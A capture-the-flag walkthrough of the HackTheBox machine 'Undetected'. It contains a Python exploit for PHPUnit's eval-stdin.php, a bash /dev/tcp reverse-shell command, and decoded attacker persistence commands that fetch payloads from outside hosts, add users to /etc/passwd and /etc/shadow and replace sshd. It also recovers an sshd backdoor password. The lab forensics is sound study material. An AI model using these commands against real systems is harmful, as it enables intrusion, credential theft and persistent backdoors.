# Undetected - HTB

[[_TOC_]]

# Summary

<div align="center"><img width="560" height="424" src="images/0.png"></div>

Undetected was an incredible medium-rated machine created by [TheCyberGeek](https://twitter.com/thecybergeek19)

For foothold, we had to exploit an arbitrary PHP code execution vulnerability in `PHPUnit`.  
Once inside the box, we discover another attacker has already compromised this box. We need to follow behind them and find the files and backdoors left after the initial attack to get privilege escalation and root.  

# Initial Recon

## nmap

```console
opcode@parrot$ nmap -p- --min-rate 5000 10.10.11.146
Nmap scan report for 10.10.11.146
Host is up (0.13s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
```

```console
opcode@parrot$ nmap -sC -sV -p 22,80 -oN undetected.nmap 10.10.11.146
Nmap scan report for 10.10.11.146
Host is up (0.17s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2 (protocol 2.0)
| ssh-hostkey: 
|   3072 be:66:06:dd:20:77:ef:98:7f:6e:73:4a:98:a5:d8:f0 (RSA)
|   256 1f:a2:09:72:70:68:f4:58:ed:1f:6c:49:7d:e2:13:39 (ECDSA)
|_  256 70:15:39:94:c2:cd:64:cb:b2:3b:d1:3e:f6:09:44:e8 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Diana's Jewelry
```

Only SSH and HTTP ports are open on this machine.
I also ran a `nmap` UDP port scan, but it didn't find anything.

## Exploring the website

Upon visiting http://10.10.11.146/ in a browser, we get to see the landing page:  
![1](images/1.png)

Most of the links on the website are not functional, but the "Visit Store" button links to http://store.djewelry.htb/

Since we now have the domain name and a valid subdomain, let's add it to `/etc/hosts`
```console
opcode@parrot$ echo "10.10.11.146 djewelry.htb store.djewelry.htb" | sudo tee -a /etc/hosts
10.10.11.146 djewelry.htb store.djewelry.htb
```

Even on http://store.djewelry.htb/index.php, things are not functional, but due to a different reason:
![2](images/2.png)

It seems that they are migrating their website.

## gobuster

We can attempt to find more subdomains with `gobuster` in `vhost` mode:
```console
opcode@parrot$ gobuster vhost -u http://djewelry.htb/ -w cybersec/wordlists/subdomains-top1million-110000.txt
```
But it wouldn't find anything new:
```
Found: store.djewelry.htb (Status: 200) [Size: 6215]
```

We can also use `gobuster` in `dir` mode to brute-force directories and files on the website:
```console
opcode@parrot$ gobuster dir -u http://djewelry.htb/ -w cybersec/wordlists/raft-small-words.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://djewelry.htb/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                cybersec/wordlists/raft-small-words.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/02/20 06:41:24 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 277]
/images               (Status: 301) [Size: 313] [--> http://djewelry.htb/images/]
/.php                 (Status: 403) [Size: 277]                                  
/js                   (Status: 301) [Size: 309] [--> http://djewelry.htb/js/]    
/css                  (Status: 301) [Size: 310] [--> http://djewelry.htb/css/]   
/.htm                 (Status: 403) [Size: 277]                                  
/.                    (Status: 200) [Size: 15283]                                
/fonts                (Status: 301) [Size: 312] [--> http://djewelry.htb/fonts/] 
/icons                (Status: 301) [Size: 312] [--> http://djewelry.htb/icons/] 
/server-status        (Status: 403) [Size: 277]                                  
[--SNIPPED 403 results that start with .ht--]
```
Nothing interesting is visible on this one.  
Let's run gobuster on http://store.djewelry.htb/ as well:
```console
opcode@parrot$ gobuster dir -u http://store.djewelry.htb/ -w cybersec/wordlists/raft-small-words.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://store.djewelry.htb/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                cybersec/wordlists/raft-small-words.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/02/20 06:48:37 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 283]
/images               (Status: 301) [Size: 325] [--> http://store.djewelry.htb/images/]
/.html                (Status: 403) [Size: 283]                                        
/js                   (Status: 301) [Size: 321] [--> http://store.djewelry.htb/js/]    
/css                  (Status: 301) [Size: 322] [--> http://store.djewelry.htb/css/]   
/.htm                 (Status: 403) [Size: 283]                                        
/.                    (Status: 200) [Size: 6215]                                       
/fonts                (Status: 301) [Size: 324] [--> http://store.djewelry.htb/fonts/] 
/vendor               (Status: 301) [Size: 325] [--> http://store.djewelry.htb/vendor/]
/server-status        (Status: 403) [Size: 283]                                        
[--SNIPPED 403 results that start with .ht--]
```

Any website should not be exposing the `/vendor` route. Let's have a look:
![3](images/3.png)

Directory listing seems to be enabled in either the apache configuration or `.htaccess` for this website.  
And among all these results, we can also see `composer`. It is a dependency manager for PHP and may leak the names and versions of all the dependencies being used.  
We can view all dependencies and their versions by visiting http://store.djewelry.htb/vendor/composer/installed.json

# Foothold

We can now search for corresponding exploits on google or exploit-db.  
We get a hit for `PHPUnit`:  
http://web.archive.org/web/20170701212357/http://phpunit.vulnbusters.com/  
It has a vulnerability which allows us to run arbitrary PHP code. With `exec()`, it can be used to run OS commands.

Let's whip up a python script to exploit this vulnerability.  
Note that I decided not to use `exec()` as it wouldn't send back the output. On the other hand, `system()` and `passthru()` would send any resulting text to the output stream.
```py
import requests
from sys import argv, exit

URL = 'http://store.djewelry.htb'

proxy = {}
# proxy['http'] = 'http://127.0.0.1:8080'


def cmd_exec(cmd):
    payload = f'<?php system("{cmd}");'

    r = requests.get(
        URL + '/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php',
        data=payload,
        proxies=proxy,
        verify=False
    )
    return r.text


if __name__ == "__main__":
    if len(argv) != 2:
        print(f'[-] Usage: python3 {argv[0]} <command>')
        print(f'[-] Example: python3 {argv[0]} "ls -la"\n')
        exit()

    res = cmd_exec(argv[1])
    print(res)
```

```console
opcode@parrot$ python3 cmd_exec.py id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

I'd start a netcat listener on port 9001 and run this command to get a reverse shell:
```console
opcode@parrot$ python3 cmd_exec.py "/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.41/9001 0>&1'"
```

And we get a shell:
```
listening on [any] 9001 ...
connect to [10.10.14.41] from (UNKNOWN) [10.10.11.146] 37292
bash: cannot set terminal process group (924): Inappropriate ioctl for device
bash: no job control in this shell
www-data@production:/var/www/store/vendor/phpunit/phpunit/src/Util/PHP$ 
```

Next, I'll upgrade the shell to make it more stable:
```
python3 -c 'import pty;pty.spawn("/bin/bash");'
ctrl + z
stty raw -echo; fg
export TERM=xterm-256color
exec /bin/bash
```

# Enumeration after foothold

## LinPEAS

Few results from the output of `linpeas.sh` stick out:

![4](images/4.png)

Very few services are running on this box. That message on the store website was truthful; they really are migrating their website.

![5](images/5.png)

There seem to be two users: `steven` and `steven1`, who share the same UID and GID, which is unusual.

![6](images/6.png)

It looks like steven has got mail.

![7](images/7.png)

This is spicy, a cron job running every minute past 3 am. We need to check it out.

![8](images/8.png)

It's weird to see a file owned by `www-data` in `/var/backups`. Let's check this one as well.

## CVE-2017-7308

```console
www-data@production:/var/backups$ file info 
info: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=0dc004db7476356e9ed477835e583c68f1d2493a, for GNU/Linux 3.2.0, not stripped
```
It is an ELF. We need to transfer it to our system and look at the pseudocode in `ghidra`  
The `main()` function:
```c
void main(void)

{
  puts("[.] starting");
  setup_sandbox();
  puts("[.] namespace sandbox set up");
  puts("[.] KASLR bypass enabled, getting kernel addr");
  KERNEL_BASE = get_kernel_addr();
  printf("[.] done, kernel text:   %lx\n",KERNEL_BASE);
  printf("[.] commit_creds:        %lx\n",KERNEL_BASE + 0xa5cf0);
  printf("[.] prepare_kernel_cred: %lx\n",KERNEL_BASE + 0xa60e0);
  printf("[.] native_write_cr4:    %lx\n",KERNEL_BASE + 0x64210);
  puts("[.] padding heap");
  kmalloc_pad(0x200);
  pagealloc_pad(0x400);
  puts("[.] done, heap is padded");
  puts("[.] SMEP & SMAP bypass enabled, turning them off");
  oob_timer_execute(KERNEL_BASE + 0x64210,0x407f0);
  puts("[.] done, SMEP & SMAP should be off now");
  printf("[.] executing get root payload %p\n",get_root_payload);
  oob_id_match_execute(get_root_payload);
  puts("[.] done, should be root now");
  check_root();
  do {
    sleep(1000);
  } while( true );
}
```
It's a kernel exploit. What does that mean? Perhaps another attacker had already compromised this machine before us?  
If that is the case, this will be a very amusing box.  
We now have to chase after the original attacker's steps and figure out if he has left any backdoors behind.

This kernel exploit corresponds to **CVE-2017-7308**, a vulnerability in `AF_PACKET` sockets implementation. We can find the PoC script at https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c

I found the CVE by searching VirusTotal with the md5 hash of this file.  
![9](images/9.png)

When we try to execute it on the box, it fails:
![10](images/10.png)

This is expected as this vulnerability only affects the Linux kernels through version 4.10.6. But on the box, we have:
```console
www-data@production:/var/backups$ uname -r
5.4.0-96-generic
```
It means that this machine was compromised a really long time ago.  
We may not find more clues if the attacker was clever. But if he wasn't, we can start suspecting older files.  
They still likely have a rootkit installed on the system.  

For the time being, we should go through the `ghidra` pseudocode.  
This `check_root` function is where the script fails when we try to run it:
```c
void check_root(void)

{
  char cVar1;
  
  puts("[.] checking if we got root");
  cVar1 = is_root();
  if (cVar1 == '\x01') {
    puts("[+] got r00t ^_^");
    fork_shell();
  }
  else {
    puts("[-] something went wrong =(");
  }
  return;
}
```

If the exploit is successful, the `fork_shell` function runs, followed by the `exec_shell` function.
```c
void exec_shell(void)

{
  char cVar1;
  byte *pbVar2;
  long i;
  undefined8 *puVar3;
  undefined8 *puVar4;
  char *args;
  undefined *local_a90;
  byte *local_a88;
  undefined8 local_a80;
  byte local_a78 [1328];
  undefined8 local_548;
  byte local_22;
  char dec;
  char *shell;
  byte *local_18;
  undefined8 *j;
  
  shell = "/bin/bash";
  puVar3 = &hex_blob;
  puVar4 = &local_548;
  for (i = 164; i != 0; i = i + -1) {
    *puVar4 = *puVar3;
    puVar3 = puVar3 + 1;
    puVar4 = puVar4 + 1;
  }
  *(undefined4 *)puVar4 = *(undefined4 *)puVar3;
  *(undefined *)((long)puVar4 + 4) = *(undefined *)((long)puVar3 + 4);
  j = &local_548;
  local_18 = local_a78;
  while (*(char *)j != '\0') {
    cVar1 = *(char *)j;
    j = (undefined8 *)((long)j + 1);
    dec = hexdigit2int(cVar1);
    j = (undefined8 *)((long)j + 1);
    local_22 = hexdigit2int();
    pbVar2 = local_18 + 1;
    *local_18 = dec << 4 | local_22;
    local_18 = pbVar2;
  }
  *local_18 = 0;
  args = shell;
  local_a90 = &DAT_00103146;
  local_a88 = local_a78;
  local_a80 = 0;
  execve(shell,&args,(char **)0x0);
  return;
}
```
This part is different from Andrey's PoC. Besides running the bash shell as root, it also performs some operations on `&hex_blob`. The pseudocode is hard to follow, so I'd try to unhex the hex string.
![11](images/11.png)

We can also find this hex string by simply running `strings`:
```console 
opcode@parrot$ strings info | grep 2074656d | xxd -r -p
wget tempfiles.xyz/authorized_keys -O /root/.ssh/authorized_keys; wget tempfiles.xyz/.main -O /var/lib/.main; chmod 755 /var/lib/.main; echo "* 3 * * * root /var/lib/.main" >> /etc/crontab; awk -F":" '$7 == "/bin/bash" && $3 >= 1000 {system("echo "$1"1:\$6\$zS7ykHfFMg3aYht4\$1IUrhZanRuDZhf1oIdnoOvXoolKmlwbkegBXk.VtGg78eL7WBM6OrNtGbZxKBtPu8Ufm9hM0R/BLdACoQ0T9n/:18813:0:99999:7::: >> /etc/shadow")}' /etc/passwd; awk -F":" '$7 == "/bin/bash" && $3 >= 1000 {system("echo "$1" "$3" "$6" "$7" > users.txt")}' /etc/passwd; while read -r user group home shell _; do echo "$user"1":x:$group:$group:,,,:$home:$shell" >> /etc/passwd; done < users.txt; rm users.txt;
```
This is interesting. It downloads `authorised_keys` from an attacker-controlled domain and places it in `/root/.ssh/` for persistence.  
Next, it also downloads another file: `.main` and places it in `/var/lib/` and makes it run periodically with `cron`.  
It doesn't stop there. It also adds a password hash to `/etc/shadow` and then adds the corresponding user to `/etc/passwd`. Note that it appends "1" to the existing user's name with UID 1000 or more, leaving the rest of the values (UID, GID, login shell...) intact.  
This explains the `steven1` we found earlier.

## C2 implant

First, let us take a look at that `.main` file.
```console
www-data@production:/var/lib$ file .main
.main: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=f3e60f6693908c6b0a63de703af439255b048273, not stripped
```
It is yet another ELF. But this one seems to be obfuscated. I couldn't make much sense of things. Even VirusTotal marks it clean.  
This one function has some identifiable parts:
```c
long g(uint param_1)

{
[--SNIP--]
  for (i = 131; i != 0; i = i + -1) {
    *(undefined8 *)pnVar3->name = 0;
    pnVar3 = (ns_rr *)(pnVar3->name + 8);
  }
  sprintf((char *)&local_f8,"c%02x.",(ulong)param_1);
  for (j = 0; j < 9; j = j + 1) {
    *(byte *)((long)&local_f8 + (long)(j + 4)) = domain[j] ^ 0xaa;
  }
  local_eb = 0;
  local_14 = __res_query(&local_f8,1,0x10,nsbuf,0x1000);
  puVar4 = &local_f8;
  for (i = 0x19; i != 0; i = i + -1) {
    *puVar4 = 0;
    puVar4 = puVar4 + (ulong)bVar5 * -2 + 1;
  }
  if ((-1 < local_14) && (iVar1 = ns_initparse(nsbuf,local_14,(ns_msg *)local_918), -1 < iVar1)) {
    local_18 = (uint)uStack2306;
    for (local_c = 0; local_c < (int)local_18; local_c = local_c + 1) {
      iVar1 = ns_parserr((ns_msg *)local_918,ns_s_an,local_c,&local_d38);
      if (iVar1 == 0) {
         local_19 = *local_d38.rdata;
         local_28 = local_d38.rdata + 1;
         local_28[local_19] = 0;
         local_d40 = 0;
         sVar2 = strlen((char *)local_28);
         local_30 = bd(local_28,sVar2,&local_d40);
         if (local_30 != 0) {
           return local_30;
         }
      }
    }
  }
  return 0;
}
```
Things like `__res_query` indicate that it might be resolving addresses.  
I could also figure out the value of `domain` after getting XORed.
![12](images/12.png)
```python
>>> domain = 'cd 9e d9 ce cd 84 d2 d3 d0'
>>> domain = domain.split()
>>> xored = [chr(int(i,16) ^ 0xaa) for i in domain]
>>> ''.join(xored)
'g4sdg.xyz'
```
Still, I wasn't able to make much progress with it. The box creator hinted that `.main` is a C2 implant and not required to solve the box.  
In fact, this file was removed from the box after a while:
![13](images/13.png)

## Cracking hash for steven account

Moving back to the string from the `info` binary, we noticed earlier that it adds a hash to `/etc/shadow`.  
Let us try cracking it with `john`:
```console
opcode@parrot$ echo "\$6\$zS7ykHfFMg3aYht4\$1IUrhZanRuDZhf1oIdnoOvXoolKmlwbkegBXk.VtGg78eL7WBM6OrNtGbZxKBtPu8Ufm9hM0R/BLdACoQ0T9n/" > hash
opcode@parrot$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
```
It successfully cracks and reveals the password `ihatehackers`

```console
www-data@production:/$ su - steven1
```
We can provide `ihatehackers` when asked for a password and get user access!

# Enumeration after getting user

## Anomaly with apache

We can check steven's mail now:
```console
steven@production:~$ cat /var/mail/steven 
From root@production  Sun, 25 Jul 2021 10:31:12 GMT
Return-Path: <root@production>
Received: from production (localhost [127.0.0.1])
	by production (8.15.2/8.15.2/Debian-18) with ESMTP id 80FAcdZ171847
	for <steven@production>; Sun, 25 Jul 2021 10:31:12 GMT
Received: (from root@localhost)
	by production (8.15.2/8.15.2/Submit) id 80FAcdZ171847;
	Sun, 25 Jul 2021 10:31:12 GMT
Date: Sun, 25 Jul 2021 10:31:12 GMT
Message-Id: <202107251031.80FAcdZ171847@production>
To: steven@production
From: root@production
Subject: Investigations

Hi Steven.

We recently updated the system but are still experiencing some strange behaviour with the Apache service.
We have temporarily moved the web store and database to another server whilst investigations are underway.
If for any reason you need access to the database or web application code, get in touch with Mark and he will generate a temporary password for you to authenticate to the temporary server.

Thanks,
sysadmin
```

Great! the original attacker likely targeted `apache` for persistence.  
We need to find an anomaly with `apache` next.

In his video for the box **Compromised**, `ippsec` talks about timestamps: package managers strip off the milliseconds from the full timestamps, whereas files modified by users retain them, making it easier to notice backdoors placed by malicious users or processes.  
Although in this case, we see this oddity with timestamps for a different reason.  

When we look at full timestamps in `/etc/apache2`, one file stands out like a sore thumb:
```console
steven@production:/etc/apache2$ find . -printf "%T+ %p\n"
[--SNIP--]
2021-07-04+16:58:35.6340669080 ./mods-enabled/negotiation.load
2021-07-04+20:39:37.9336802620 ./mods-enabled/php7.4.conf
2021-07-04+16:58:35.6740672500 ./mods-enabled/setenvif.load
2021-07-04+16:58:35.6740672500 ./mods-enabled/setenvif.conf
2021-05-17+07:10:04.0000000000 ./mods-enabled/reader.load
2021-07-04+16:58:35.2180633500 ./mods-enabled/authz_core.load
2021-07-04+16:58:35.7180676260 ./mods-enabled/filter.load
2021-07-04+16:58:35.3860647880 ./mods-enabled/authz_user.load
2021-07-04+16:58:35.4700655050 ./mods-enabled/dir.conf
2021-07-04+16:58:35.6340669080 ./mods-enabled/negotiation.conf
2021-07-05+17:45:58.3274855800 ./mods-enabled/autoindex.load
2021-07-04+16:58:35.8420686850 ./mods-enabled/reqtimeout.conf
2021-07-04+16:58:35.7580679680 ./mods-enabled/deflate.conf
2021-07-04+16:58:35.2220633860 ./mods-enabled/authz_host.load
```
The `reader.load` does not have the milliseconds in its timestamp, which is suspicious.

```console
steven@production:/etc/apache2$ cat mods-enabled/reader.load 
LoadModule reader_module      /usr/lib/apache2/modules/mod_reader.so
```
It points us to module `mod_reader.so`  
Regarding modules, they are programs used to extend the server's functionality. They can certainly be used to do something malicious.
```console
steven@production:/etc/apache2$ file /usr/lib/apache2/modules/mod_reader.so
/usr/lib/apache2/modules/mod_reader.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=e26fdc45e4b6561d29af8306c2be74f35ab140bb, with debug_info, not stripped
```
And you guessed it, we have yet another ELF, but a shared object this time.  

Since it is a shared object, it would not have the main function when we look at it in `ghidra`. There are very few functions, and looking through those, we can find the function of interest: `hook_post_config`
```c
int hook_post_config(apr_pool_t *pconf,apr_pool_t *plog,apr_pool_t *ptemp,server_rec *s)

{
  long lVar1;
  long in_FS_OFFSET;
  char *args [4];
  
  lVar1 = *(long *)(in_FS_OFFSET + 0x28);
  pid = fork();
  if (pid == 0) {
    b64_decode("d2dldCBzaGFyZWZpbGVzLnh5ei9pbWFnZS5qcGVnIC1PIC91c3Ivc2Jpbi9zc2hkOyB0b3VjaCAtZCBgZGF0 ZSArJVktJW0tJWQgLXIgL3Vzci9zYmluL2EyZW5tb2RgIC91c3Ivc2Jpbi9zc2hk"
                ,(char *)0x0);
    args[2] = (char *)0x0;
    args[3] = (char *)0x0;
    args[0] = "/bin/bash";
    args[1] = "-c";
    execve("/bin/bash",args,(char **)0x0);
  }
  if (lVar1 == *(long *)(in_FS_OFFSET + 0x28)) {
    return 0;
  }
                      /* WARNING: Subroutine does not return */
  __stack_chk_fail();
}
```
It base64 decodes that string and uses the result as arguments while executing `/bin/bash`

```console
opcode@parrot$ echo "d2dldCBzaGFyZWZpbGVzLnh5ei9pbWFnZS5qcGVnIC1PIC91c3Ivc2Jpbi9zc2hkOyB0b3VjaCAtZCBgZGF0ZSArJVktJW0tJWQgLXIgL3Vzci9zYmluL2EyZW5tb2RgIC91c3Ivc2Jpbi9zc2hk" | base64 -d
wget sharefiles.xyz/image.jpeg -O /usr/sbin/sshd; touch -d `date +%Y-%m-%d -r /usr/sbin/a2enmod` /usr/sbin/sshd
```

They decided to backdoor `sshd` itself, and that's smart. I wouldn't suspect a random `sshd` process starting up on a machine shared by several users.

And they even fake the timestamp to avoid suspicion. But on the contrary, that tampered timestamp helped us pinpoint the malicious files. `a2enmod` isn't a file that the user would usually touch. Hence, it doesn't have milliseconds in its timestamp. I bet they used a similar system file for fabricating the timestamp for `reader.load`  

## `sshd` backdoor

So, let's transfer the `sshd` binary to our system. This is a huge binary and it isn't easy to find which parts the attacker modified to place the backdoor.  
So instead, we can google for "sshd backdoor" and look through the results.

I found this one pretty quickly: https://web.archive.org/web/20210417031309/https://blog.securitee.org/?p=31  
They modify the `auth_password` function:
```c
#define B4XDOOR “backdoorpasswordhere”
int backdoorActive = 0;

if (!strcmp(password, B4XDOOR)) {
  backdoorActive = 1;
  return 1;
}
```

In ghidra, we can observe that the `auth_password` function in the `sshd` binary from the box has been similarly modified:
```c
int auth_password(ssh *ssh,char *password)

{
  Authctxt *ctxt;
  passwd *ppVar1;
  int iVar2;
  uint uVar3;
  byte *pbVar4;
  byte *pbVar5;
  size_t sVar6;
  byte bVar7;
  int iVar8;
  long in_FS_OFFSET;
  char backdoor [31];
  byte local_39 [9];
  long local_30;
  
  bVar7 = 0xd6;
  ctxt = (Authctxt *)ssh->authctxt;
  local_30 = *(long *)(in_FS_OFFSET + 0x28);
  backdoor._28_2_ = 0xa9f4;
  ppVar1 = ctxt->pw;
  iVar8 = ctxt->valid;
  backdoor._24_4_ = 0xbcf0b5e3;
  backdoor._16_8_ = 0xb2d6f4a0fda0b3d6;
  backdoor[30] = -0x5b;
  backdoor._0_4_ = 0xf0e7abd6;
  backdoor._4_4_ = 0xa4b3a3f3;
  backdoor._8_4_ = 0xf7bbfdc8;
  backdoor._12_4_ = 0xfdb3d6e7;
  pbVar4 = (byte *)backdoor;
  while( true ) {
    pbVar5 = pbVar4 + 1;
    *pbVar4 = bVar7 ^ 0x96;
    if (pbVar5 == local_39) break;
    bVar7 = *pbVar5;
    pbVar4 = pbVar5;
  }
  iVar2 = strcmp(password,backdoor);
  uVar3 = 1;
  if (iVar2 != 0) {
    sVar6 = strlen(password);
    uVar3 = 0;
    if (sVar6 < 0x401) {
      if ((ppVar1->pw_uid == 0) && (options.permit_root_login != 3)) {
         iVar8 = 0;
      }
      if ((*password != '\0') ||
          (uVar3 = options.permit_empty_passwd, options.permit_empty_passwd != 0)) {
         if (auth_password::expire_checked == 0) {
           auth_password::expire_checked = 1;
           iVar2 = auth_shadow_pwexpired(ctxt);
           if (iVar2 != 0) {
             ctxt->force_pwchange = 1;
           }
         }
         iVar2 = sys_auth_passwd(ssh,password);
         if (ctxt->force_pwchange != 0) {
           auth_restrict_session(ssh);
         }
         uVar3 = (uint)(iVar2 != 0 && iVar8 != 0);
      }
    }
  }
  if (local_30 == *(long *)(in_FS_OFFSET + 0x28)) {
    return uVar3;
  }
  __stack_chk_fail();
}
```
The password input is compared with the XOR of a hardcoded value (`backdoor`) first, and if that fails, it is compared against the actual root password.  
The goal is to reverse the XOR and figure out the actual password from the fragmented string `backdoor`.

This is something standard in CTF reversing challenges. When comparing a string, you often see its value fragmented in the pseudocode.  
And in such cases, while reconstructing the original string, we also need to swap the endianness.  
That `while` loop that transforms every byte is just a simple XOR, so we can copy the pseudocode to reverse the XOR operation, as it is self inverse.

So I reused the pseudocode and wrote a simple C program (backdoor_pass.c) to reverse the operation and print the backdoor password:
```c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main()
{
  unsigned char *pbVar4;
  unsigned char *pbVar5;
  unsigned char bVar7;

  // char backdoor [31];
  unsigned char local_39 [9];
  
  bVar7 = 0xd6;

  char backdoor [31] = { 0xd6, 0xab, 0xe7, 0xf0, 0xf3, 0xa3, 0xb3, 0xa4, 0xc8, 0xfd, 0xbb, 0xf7, 0xe7, 0xd6, 0xb3, 0xfd, 0xd6, 0xb3, 0xa0, 0xfd, 0xa0, 0xf4,0xd6, 0xb2, 0xe3, 0xb5, 0xf0, 0xbc, 0xf4, 0xa9, -0x5b};

  pbVar4 = (unsigned char *)backdoor;
  while(1) {
    pbVar5 = pbVar4 + 1;
    *pbVar4 = bVar7 ^ 0x96;
    if (pbVar5 == local_39) break;
    bVar7 = *pbVar5;
    pbVar4 = pbVar5;
  }
  puts(backdoor);
  return 0;
}
```

```console
opcode@parrot$ gcc -Wall backdoor_pass.c -o backdoor_pass
opcode@parrot$ ./backdoor_pass
@=qfe5%2^k-aq@%k@%6k6b@$u#f*b?3
```

This password can be used to SSH to the box as root:
```console
opcode@parrot$ sshpass -p '@=qfe5%2^k-aq@%k@%6k6b@$u#f*b?3' ssh -o StrictHostKeyChecking=no root@10.10.11.146
```

```console
root@production:~# id
uid=0(root) gid=0(root) groups=0(root)
```
And that's it! We got root!
